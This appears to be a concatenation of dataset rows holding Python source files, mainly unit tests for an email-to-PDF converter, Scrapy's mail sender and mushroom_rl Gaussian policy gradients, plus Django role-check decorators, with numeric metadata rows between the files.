self.assertEqual(0, rc)
self.assertTrue(self.existsByTime())
self.assertEqual('', error)
self.assertRegex(self.getPDFText(self.getTimedFilename()), "ɯɐɹƃoɹd ɟpd lᴉɐɯǝ ǝɥʇ ɟo ʇsǝʇ ɐ sᴉ sᴉɥʇ ollǝH\n\n\x0c")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_attachhtml_upsidedown(self):
self.addHeaders()
self.attachHTML("<p>ɯɐɹƃoɹd ɟpdᄅlᴉɐɯǝ ǝɥʇ ɟo ʇsǝʇ ɐ sᴉ sᴉɥʇ ollǝH</p>")
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertTrue(self.existsByTime())
self.assertEqual('', error)
self.assertRegex(self.getPDFText(self.getTimedFilename()), "ɯɐɹƃoɹd ɟpd lᴉɐɯǝ ǝɥʇ ɟo ʇsǝʇ ɐ sᴉ sᴉɥʇ ollǝH\n\n\x0c")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_html_entities_currency(self):
path = os.path.join(self.examineDir, "htmlEntitiesCurrency.pdf")
self.addHeaders()
self.attachHTML(b'<span>Pounds: \xc2\xa37.14, Another Pounds: £7.14</span>'.decode('utf-8'))
(rc, output, error) = self.invokeAsSubprocess(outputFile=path)
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(os.path.exists(path))
self.assertRegex(self.getPDFText(path), "Pounds:\s£7.14,\sAnother\sPounds:\s£7.14")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_html_poundsign_iso88591(self):
self.addHeaders()
path = os.path.join(self.examineDir, "html_poundsign_iso88591.pdf")
self.attachHTML("Hello - this email costs \xa35!", charset="ISO-8859-1")
(rc, output, error) = self.invokeAsSubprocess(outputFile=path)
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(os.path.exists(path))
self.assertRegex(self.getPDFText(path), "Hello\s-\sthis\semail\scosts\s\xa35!")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_text_poundsign_iso88591(self):
self.addHeaders()
path = os.path.join(self.examineDir, "text_poundsign_iso88591.pdf")
self.attachText("Hello - this email costs \xa35!", charset="ISO-8859-1")
(rc, output, error) = self.invokeAsSubprocess(outputFile=path)
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(os.path.exists(path))
self.assertRegex(self.getPDFText(path), "Hello\s-\sthis\semail\scosts\s\xa35!")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_plaincontent_poundsign_utf8_8bit(self):
input_email = ("From: \"XYZ\" <xyz@abc.uk>\n"
"To: \"XYZ\" <xyz@gmail.com>\n"
"Subject: Blah\n"
"Content-Type: multipart/mixed; boundary=\"CUT-HERE--\"\n"
"\n"
"--CUT-HERE--\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"\n"
"Price is £45.00\n"
"--CUT-HERE----\n")
path = os.path.join(self.examineDir, "plaincontent_poundsign_utf8_8bit.pdf")
(rc, output, error) = self.invokeAsSubprocess(inputFile=input_email, outputFile=path,
extraParams=['--input-encoding=utf-8'])
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(os.path.exists(path))
self.assertRegex(self.getPDFText(path), "Price\sis\s£45.00")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_plainandhtml(self):
self.addHeaders()
self.attachText("Some basic textual content")
self.attachHTML("<p>Some basic HTML content</p>")
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some\sbasic\sHTML\scontent")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_wrong_charset_html(self):
self.addHeaders()
broken_body = b"<p>Something with raw accents: \xe9</p>"
self.attachHTML(broken_body, charset="utf-8")
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Something\swith\sraw\saccents:\s\é")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_pdf(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content")
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some\sbasic\stextual\scontent")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename)), "Some\sPDF\scontent")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_plaincontent_outputfileoverrides_with_attachments(self):
mainFilename = os.path.join(self.examineDir, "outputFileOverridesWithAttachments.pdf")
self.attachText("Hello!")
attachmentFilename = self.attachPDF("Some PDF content")
with tempfile.TemporaryDirectory() as tempdir:
(rc, output, error) = self.invokeAsSubprocess(outputDirectory=tempdir, outputFile=mainFilename)
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertFalse(self.existsByTime())
self.assertFalse(self.existsByTime(tempdir))
self.assertFalse(os.path.exists(os.path.join(tempdir, "outputFileOverrides.pdf")))
self.assertFalse(os.path.exists(os.path.join(self.workingDir, "outputFileOverrides.pdf")))
self.assertTrue(os.path.exists(mainFilename))
self.assertFalse(os.path.exists(os.path.join(self.examineDir, attachmentFilename)))
self.assertFalse(os.path.exists(os.path.join(self.workingDir, attachmentFilename)))
self.assertTrue(os.path.exists(os.path.join(tempdir, attachmentFilename)))
self.assertRegex(self.getPDFText(mainFilename), "Hello!")
self.assertRegex(self.getPDFText(os.path.join(tempdir, attachmentFilename)), "Some\sPDF\scontent")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_remote_image_does_exist(self):
if self.isOnline:
path = os.path.join(self.examineDir, "remoteImageDoesExist.pdf")
self.addHeaders()
self.attachHTML('<img src="' + self.EXIST_IMG + '">')
(rc, output, error) = self.invokeAsSubprocess(outputFile=path)
self.assertEqual(2, rc)
self.assertEqual('ERROR:', error.split()[0])
self.assertTrue(os.path.exists(path))
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
else:
self.skipTest("Not online.")
def test_remote_image_does_exist_uppercase(self):
if self.isOnline:
path = os.path.join(self.examineDir, "remoteImageDoesExistUppercase.pdf")
self.addHeaders()
self.attachHTML('<img src="' + self.EXIST_IMG_UPPERCASE + '">')
(rc, output, error) = self.invokeAsSubprocess(outputFile=path)
self.assertEqual(2, rc)
self.assertEqual('ERROR:', error.split()[0])
self.assertTrue(os.path.exists(path))
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
else:
self.skipTest("Not online.")
def test_non_embedded_image_jpeg(self):
self.addHeaders()
self.attachText("Hello!")
imageFilename = self.attachImage(jpeg=True)
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, imageFilename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Hello!")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_non_embedded_image_jpeg_add_prefix_date(self):
self.addHeaders()
self.attachText("Hello!")
imageFilename = self.attachImage(jpeg=True)
(rc, output, error) = self.invokeAsSubprocess(extraParams=['--add-prefix-date'])
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, datetime.now().strftime("%Y-%m-%d-") + imageFilename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Hello!")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_non_embedded_image_png(self):
self.addHeaders()
self.attachText("Hello!")
imageFilename = self.attachImage(jpeg=False)
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, imageFilename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Hello!")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_non_embedded_image_and_pdf(self):
self.addHeaders()
self.attachText("Hello!")
imageFilename = self.attachImage()
filename = self.attachPDF("Some PDF content")
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertTrue(os.path.exists(os.path.join(self.workingDir, imageFilename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Hello!")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename)), "Some\sPDF\scontent")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_2pdfs(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content")
filename2 = self.attachPDF("Some More PDF content")
self.assertFalse(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertFalse(os.path.exists(os.path.join(self.workingDir, filename2)))
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename2)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename)), "Some PDF content")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename2)), "Some More PDF content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_pdf_exists(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content")
self.assertFalse(os.path.exists(os.path.join(self.workingDir, filename)))
self.touch(os.path.join(self.workingDir, filename))
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
rootName, unused_extension = os.path.splitext(filename)
uniqueName = rootName + "_1.pdf"
self.assertTrue(os.path.exists(os.path.join(self.workingDir, uniqueName)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertIsNone(self.getPDFText(os.path.join(self.workingDir, filename)))
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, uniqueName)), "Some PDF content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_2pdfs_oneexists(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content")
filename2 = self.attachPDF("Some More PDF content")
self.assertFalse(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertFalse(os.path.exists(os.path.join(self.workingDir, filename2)))
self.touch(os.path.join(self.workingDir, filename))
(rc, output, error) = self.invokeAsSubprocess()
self.assertEqual(0, rc)
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
rootName, unused_extension = os.path.splitext(filename)
uniqueName = rootName + "_1.pdf"
self.assertTrue(os.path.exists(os.path.join(self.workingDir, uniqueName)))
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename2)))
rootName2, unused_extension2 = os.path.splitext(filename2)
uniqueName2 = rootName2 + "_1.pdf"
self.assertFalse(os.path.exists(os.path.join(self.workingDir, uniqueName2)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertIsNone(self.getPDFText(os.path.join(self.workingDir, filename)))
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, uniqueName)), "Some PDF content")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename2)), "Some More PDF content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
| 49.383285
| 124
| 0.664041
| 1,820
| 17,136
| 6.207143
| 0.113187
| 0.040896
| 0.080729
| 0.049571
| 0.854829
| 0.82606
| 0.806763
| 0.804815
| 0.790741
| 0.769939
| 0
| 0.00901
| 0.203373
| 17,136
| 346
| 125
| 49.526012
| 0.818255
| 0
| 0
| 0.720257
| 0
| 0.003215
| 0.10866
| 0.031104
| 0
| 0
| 0
| 0
| 0.543408
| 1
| 0.07717
| false
| 0
| 0.016077
| 0
| 0.096463
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5d62e631a79c45d3da50aa99d1a28f3c6b87bc14
| 1,418
|
py
|
Python
|
accounts/decorators.py
|
qinyanjuidavid/Raki
|
2bca3e6a6f410619c699be8c45cd2cad8aa08e0c
|
[
"MIT"
] | null | null | null |
accounts/decorators.py
|
qinyanjuidavid/Raki
|
2bca3e6a6f410619c699be8c45cd2cad8aa08e0c
|
[
"MIT"
] | null | null | null |
accounts/decorators.py
|
qinyanjuidavid/Raki
|
2bca3e6a6f410619c699be8c45cd2cad8aa08e0c
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.decorators import user_passes_test
def administrator_required(function=None,
                           redirect_field_name=REDIRECT_FIELD_NAME,
                           login_url="/accounts/login/"):
    """Decorator restricting a view to active administrator users.

    A user passes if the account is active AND either the role is
    "Administrator" or the ``is_admin`` flag is set.

    Bug fixed: the original test
    ``u.is_active and u.role == "Administrator" or u.is_admin == True``
    let *inactive* accounts through whenever ``is_admin`` was true,
    because ``and`` binds tighter than ``or``.  The parentheses below
    make ``is_active`` mandatory for both branches; ``== True`` is
    replaced by plain truthiness.

    Args:
        function: optional view to wrap directly (decorator-with-args style).
        redirect_field_name: query parameter carrying the "next" URL.
        login_url: where unauthenticated/unauthorized users are sent.

    Returns:
        The wrapped view when ``function`` is given, otherwise the decorator.
    """
    actual_decorator = user_passes_test(
        lambda u: u.is_active and (u.role == "Administrator" or u.is_admin),
        login_url=login_url,
        redirect_field_name=redirect_field_name
    )
    if function:
        return actual_decorator(function)
    return actual_decorator
def customer_required(function=None,
                      redirect_field_name=REDIRECT_FIELD_NAME,
                      login_url="/accounts/login/"):
    """Decorator restricting a view to active users with the "Customer" role.

    Args:
        function: optional view to wrap directly (decorator-with-args style).
        redirect_field_name: query parameter carrying the "next" URL.
        login_url: where unauthorized users are redirected.

    Returns:
        The wrapped view when ``function`` is given, otherwise the decorator.
    """
    def is_customer(user):
        # Access is granted only to active accounts in the Customer role.
        return user.is_active and user.role == "Customer"

    decorator = user_passes_test(
        is_customer,
        login_url=login_url,
        redirect_field_name=redirect_field_name
    )
    return decorator(function) if function else decorator
def dealer_required(function=None,
                    redirect_field_name=REDIRECT_FIELD_NAME,
                    login_url="/accounts/login/"):
    """Decorator restricting a view to active users with the "Dealer" role.

    Args:
        function: optional view to wrap directly (decorator-with-args style).
        redirect_field_name: query parameter carrying the "next" URL.
        login_url: where unauthorized users are redirected.

    Returns:
        The wrapped view when ``function`` is given, otherwise the decorator.
    """
    def is_dealer(user):
        # Access is granted only to active accounts in the Dealer role.
        return user.is_active and user.role == "Dealer"

    decorator = user_passes_test(
        is_dealer,
        login_url=login_url,
        redirect_field_name=redirect_field_name
    )
    return decorator(function) if function else decorator
| 29.541667
| 82
| 0.666432
| 166
| 1,418
| 5.337349
| 0.210843
| 0.190745
| 0.249436
| 0.1693
| 0.812641
| 0.812641
| 0.812641
| 0.812641
| 0.812641
| 0.812641
| 0
| 0
| 0.264457
| 1,418
| 47
| 83
| 30.170213
| 0.849473
| 0
| 0
| 0.685714
| 0
| 0
| 0.052891
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085714
| false
| 0.114286
| 0.057143
| 0
| 0.314286
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
53dbc06869472920c14e0052ed4fc609a8294557
| 4,764
|
py
|
Python
|
tests/test_mail.py
|
wahello/scrapy
|
b82a480e91ba3fb43b8c75f1e70d204919105e4b
|
[
"BSD-3-Clause"
] | 3
|
2020-08-06T04:59:26.000Z
|
2020-08-19T01:22:39.000Z
|
tests/test_mail.py
|
wahello/scrapy
|
b82a480e91ba3fb43b8c75f1e70d204919105e4b
|
[
"BSD-3-Clause"
] | 4
|
2020-06-06T03:16:43.000Z
|
2020-07-27T16:43:50.000Z
|
tests/test_mail.py
|
wahello/scrapy
|
b82a480e91ba3fb43b8c75f1e70d204919105e4b
|
[
"BSD-3-Clause"
] | null | null | null |
# coding=utf-8
import unittest
from io import BytesIO
from email.charset import Charset
from scrapy.mail import MailSender
class MailSenderTest(unittest.TestCase):
    """Tests for scrapy.mail.MailSender in debug mode.

    With ``debug=True`` nothing is actually sent; ``send`` invokes the
    ``_callback`` with the would-be mail, which ``_catch_mail_sent``
    stores on ``self.catched_msg`` for the assertions to inspect.
    """
    def test_send(self):
        mailsender = MailSender(debug=True)
        mailsender.send(to=['test@scrapy.org'], subject='subject', body='body',
                        _callback=self._catch_mail_sent)
        # The callback must have fired and recorded the message.
        assert self.catched_msg
        self.assertEqual(self.catched_msg['to'], ['test@scrapy.org'])
        self.assertEqual(self.catched_msg['subject'], 'subject')
        self.assertEqual(self.catched_msg['body'], 'body')
        msg = self.catched_msg['msg']
        self.assertEqual(msg['to'], 'test@scrapy.org')
        self.assertEqual(msg['subject'], 'subject')
        self.assertEqual(msg.get_payload(), 'body')
        self.assertEqual(msg.get('Content-Type'), 'text/plain')
    def test_send_single_values_to_and_cc(self):
        # NOTE(review): smoke test only -- verifies scalar (non-list)
        # to/cc values are accepted without raising; it makes no
        # assertions.  Consider asserting on self.catched_msg.
        mailsender = MailSender(debug=True)
        mailsender.send(to='test@scrapy.org', subject='subject', body='body',
                        cc='test@scrapy.org', _callback=self._catch_mail_sent)
    def test_send_html(self):
        mailsender = MailSender(debug=True)
        mailsender.send(to=['test@scrapy.org'], subject='subject',
                        body='<p>body</p>', mimetype='text/html',
                        _callback=self._catch_mail_sent)
        msg = self.catched_msg['msg']
        self.assertEqual(msg.get_payload(), '<p>body</p>')
        self.assertEqual(msg.get('Content-Type'), 'text/html')
    def test_send_attach(self):
        attach = BytesIO()
        attach.write(b'content')
        attach.seek(0)
        # Attachment triple: (name, mimetype, file-like object).
        attachs = [('attachment', 'text/plain', attach)]
        mailsender = MailSender(debug=True)
        mailsender.send(to=['test@scrapy.org'], subject='subject', body='body',
                        attachs=attachs, _callback=self._catch_mail_sent)
        assert self.catched_msg
        self.assertEqual(self.catched_msg['to'], ['test@scrapy.org'])
        self.assertEqual(self.catched_msg['subject'], 'subject')
        self.assertEqual(self.catched_msg['body'], 'body')
        msg = self.catched_msg['msg']
        self.assertEqual(msg['to'], 'test@scrapy.org')
        self.assertEqual(msg['subject'], 'subject')
        # With an attachment the payload is multipart: [text, attachment].
        payload = msg.get_payload()
        assert isinstance(payload, list)
        self.assertEqual(len(payload), 2)
        text, attach = payload
        self.assertEqual(text.get_payload(decode=True), b'body')
        self.assertEqual(text.get_charset(), Charset('us-ascii'))
        self.assertEqual(attach.get_payload(decode=True), b'content')
    def _catch_mail_sent(self, **kwargs):
        """Debug-mode callback: record the sent-mail kwargs for assertions."""
        self.catched_msg = dict(**kwargs)
    def test_send_utf8(self):
        subject = u'sübjèçt'
        body = u'bödÿ-àéïöñß'
        mailsender = MailSender(debug=True)
        mailsender.send(to=['test@scrapy.org'], subject=subject, body=body,
                        charset='utf-8', _callback=self._catch_mail_sent)
        assert self.catched_msg
        self.assertEqual(self.catched_msg['subject'], subject)
        self.assertEqual(self.catched_msg['body'], body)
        msg = self.catched_msg['msg']
        self.assertEqual(msg['subject'], subject)
        self.assertEqual(msg.get_payload(), body)
        self.assertEqual(msg.get_charset(), Charset('utf-8'))
        self.assertEqual(msg.get('Content-Type'), 'text/plain; charset="utf-8"')
    def test_send_attach_utf8(self):
        subject = u'sübjèçt'
        body = u'bödÿ-àéïöñß'
        attach = BytesIO()
        attach.write(body.encode('utf-8'))
        attach.seek(0)
        attachs = [('attachment', 'text/plain', attach)]
        mailsender = MailSender(debug=True)
        mailsender.send(to=['test@scrapy.org'], subject=subject, body=body,
                        attachs=attachs, charset='utf-8',
                        _callback=self._catch_mail_sent)
        assert self.catched_msg
        self.assertEqual(self.catched_msg['subject'], subject)
        self.assertEqual(self.catched_msg['body'], body)
        msg = self.catched_msg['msg']
        self.assertEqual(msg['subject'], subject)
        self.assertEqual(msg.get_charset(), Charset('utf-8'))
        self.assertEqual(msg.get('Content-Type'),
                         'multipart/mixed; charset="utf-8"')
        payload = msg.get_payload()
        assert isinstance(payload, list)
        self.assertEqual(len(payload), 2)
        text, attach = payload
        self.assertEqual(text.get_payload(decode=True).decode('utf-8'), body)
        self.assertEqual(text.get_charset(), Charset('utf-8'))
        self.assertEqual(attach.get_payload(decode=True).decode('utf-8'), body)
# Allow running this test module directly: ``python tests/test_mail.py``.
if __name__ == "__main__":
    unittest.main()
| 37.511811
| 80
| 0.622796
| 561
| 4,764
| 5.139037
| 0.130125
| 0.171696
| 0.097121
| 0.052029
| 0.83316
| 0.811655
| 0.811655
| 0.749913
| 0.710024
| 0.683663
| 0
| 0.004632
| 0.229639
| 4,764
| 126
| 81
| 37.809524
| 0.780926
| 0.002519
| 0
| 0.604167
| 0
| 0
| 0.136211
| 0
| 0
| 0
| 0
| 0
| 0.40625
| 1
| 0.072917
| false
| 0
| 0.041667
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9908d8f4e303c64626cf0b77116a7563242ee69c
| 51
|
py
|
Python
|
examples/one/rule_4.py
|
ayushpallav/anthill
|
740b8fce4281dfc4ca587c21a2d37741c649d870
|
[
"MIT"
] | 14
|
2020-05-22T20:57:29.000Z
|
2021-08-19T14:56:32.000Z
|
examples/one/rule_4.py
|
ayushpallav/apple-pie
|
740b8fce4281dfc4ca587c21a2d37741c649d870
|
[
"MIT"
] | 2
|
2021-01-04T05:05:08.000Z
|
2021-01-04T05:11:08.000Z
|
examples/one/rule_4.py
|
ayushpallav/apple-pie
|
740b8fce4281dfc4ca587c21a2d37741c649d870
|
[
"MIT"
] | null | null | null |
# Example rule module: prints a banner on import so it is visible
# when (and whether) the rule engine loads/executes this rule file.
print("-----------------rule_4------------------")
| 25.5
| 50
| 0.215686
| 3
| 51
| 3.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02
| 0.019608
| 51
| 1
| 51
| 51
| 0.18
| 0
| 0
| 0
| 0
| 0
| 0.803922
| 0.803922
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
54e0b539feade859123bfe6c4d6a679e4f52ceeb
| 4,166
|
py
|
Python
|
tests/policy/test_gaussian_policy.py
|
PuzeLiu/mushroom-rl
|
99942b425e66b4ddcc26009d7105dde23841e95d
|
[
"MIT"
] | 344
|
2020-01-10T09:45:02.000Z
|
2022-03-30T09:48:28.000Z
|
tests/policy/test_gaussian_policy.py
|
AmmarFahmy/mushroom-rl
|
2625ee7f64d5613b3b9fba00f0b7a39fece88ca5
|
[
"MIT"
] | 44
|
2020-01-23T03:00:56.000Z
|
2022-03-25T17:14:22.000Z
|
tests/policy/test_gaussian_policy.py
|
AmmarFahmy/mushroom-rl
|
2625ee7f64d5613b3b9fba00f0b7a39fece88ca5
|
[
"MIT"
] | 93
|
2020-01-10T21:17:58.000Z
|
2022-03-31T17:58:52.000Z
|
from mushroom_rl.policy.gaussian_policy import *
from mushroom_rl.approximators.regressor import Regressor
from mushroom_rl.approximators.parametric import LinearApproximator
from mushroom_rl.utils.numerical_gradient import numerical_diff_policy
def test_univariate_gaussian():
    """Analytic gradient of a 1-D Gaussian policy matches the numerical one."""
    np.random.seed(88)
    input_dim = 5
    covariance = 1e-3 * np.eye(1)
    mean_regressor = Regressor(LinearApproximator,
                               input_shape=(input_dim,),
                               output_shape=(1,))
    policy = GaussianPolicy(mean_regressor, covariance)
    policy.set_weights(np.random.rand(policy.weights_size))
    # Compare the analytic log-policy gradient with a finite-difference
    # estimate on 20 random states.
    for sample in np.random.randn(20, input_dim):
        state = np.atleast_1d(sample)
        action = policy.draw_action(state)
        analytic = policy.diff(state, action)
        numeric = numerical_diff_policy(policy, state, action)
        assert np.allclose(analytic, numeric)
def test_multivariate_gaussian():
    """Analytic gradient of a full-covariance Gaussian policy matches the
    numerical estimate."""
    np.random.seed(88)
    input_dim, action_dim = 5, 3
    # M @ M.T gives a random symmetric positive semi-definite covariance.
    m = np.random.rand(action_dim, action_dim)
    covariance = m.dot(m.T)
    mean_regressor = Regressor(LinearApproximator,
                               input_shape=(input_dim,),
                               output_shape=(action_dim,))
    policy = GaussianPolicy(mean_regressor, covariance)
    policy.set_weights(np.random.rand(policy.weights_size))
    # Compare analytic vs finite-difference gradients on 20 random states.
    for sample in np.random.randn(20, input_dim):
        state = np.atleast_1d(sample)
        action = policy.draw_action(state)
        analytic = policy.diff(state, action)
        numeric = numerical_diff_policy(policy, state, action)
        assert np.allclose(analytic, numeric)
def test_multivariate_diagonal_gaussian():
    """Analytic gradient of a diagonal Gaussian policy matches the
    numerical estimate."""
    np.random.seed(88)
    input_dim, action_dim = 5, 3
    # Per-dimension standard deviations for the diagonal covariance.
    stds = np.random.randn(action_dim)
    mean_regressor = Regressor(LinearApproximator,
                               input_shape=(input_dim,),
                               output_shape=(action_dim,))
    policy = DiagonalGaussianPolicy(mean_regressor, stds)
    policy.set_weights(np.random.rand(policy.weights_size))
    # Compare analytic vs finite-difference gradients on 20 random states.
    for sample in np.random.randn(20, input_dim):
        state = np.atleast_1d(sample)
        action = policy.draw_action(state)
        analytic = policy.diff(state, action)
        numeric = numerical_diff_policy(policy, state, action)
        assert np.allclose(analytic, numeric)
def test_multivariate_state_std_gaussian():
    """Analytic gradient of a state-dependent-std Gaussian policy matches
    the numerical estimate."""
    np.random.seed(88)
    input_dim, action_dim = 5, 3
    mean_regressor = Regressor(LinearApproximator,
                               input_shape=(input_dim,),
                               output_shape=(action_dim,))
    std_regressor = Regressor(LinearApproximator,
                              input_shape=(input_dim,),
                              output_shape=(action_dim,))
    policy = StateStdGaussianPolicy(mean_regressor, std_regressor)
    # The +.1 offset keeps the std-regressor weights strictly positive.
    policy.set_weights(np.random.rand(policy.weights_size) + .1)
    # Compare analytic vs finite-difference gradients on 20 random states.
    for sample in np.random.randn(20, input_dim):
        state = np.atleast_1d(sample)
        action = policy.draw_action(state)
        analytic = policy.diff(state, action)
        numeric = numerical_diff_policy(policy, state, action)
        assert np.allclose(analytic, numeric)
def test_multivariate_state_log_std_gaussian():
    """Gaussian policy with a state-dependent log-std head: analytic vs.
    numerical gradient check over 20 random states."""
    np.random.seed(88)
    n_dims = 5
    n_outs = 3

    mu_approximator = Regressor(LinearApproximator,
                                input_shape=(n_dims,),
                                output_shape=(n_outs,))
    log_var_approximator = Regressor(LinearApproximator,
                                     input_shape=(n_dims,),
                                     output_shape=(n_outs,))
    pi = StateLogStdGaussianPolicy(mu_approximator, log_var_approximator)
    pi.set_weights(np.random.rand(pi.weights_size))

    for x_i in np.random.randn(20, n_dims):
        state = np.atleast_1d(x_i)
        action = pi.draw_action(state)
        assert np.allclose(pi.diff(state, action),
                           numerical_diff_policy(pi, state, action))
| 29.757143
| 73
| 0.630101
| 520
| 4,166
| 4.765385
| 0.126923
| 0.054883
| 0.068604
| 0.124294
| 0.805892
| 0.797014
| 0.797014
| 0.797014
| 0.774415
| 0.748184
| 0
| 0.012987
| 0.279165
| 4,166
| 139
| 74
| 29.971223
| 0.812188
| 0
| 0
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05102
| 1
| 0.05102
| false
| 0
| 0.040816
| 0
| 0.091837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54e66c562a6c9478f9370ccb2f800e12b0084108
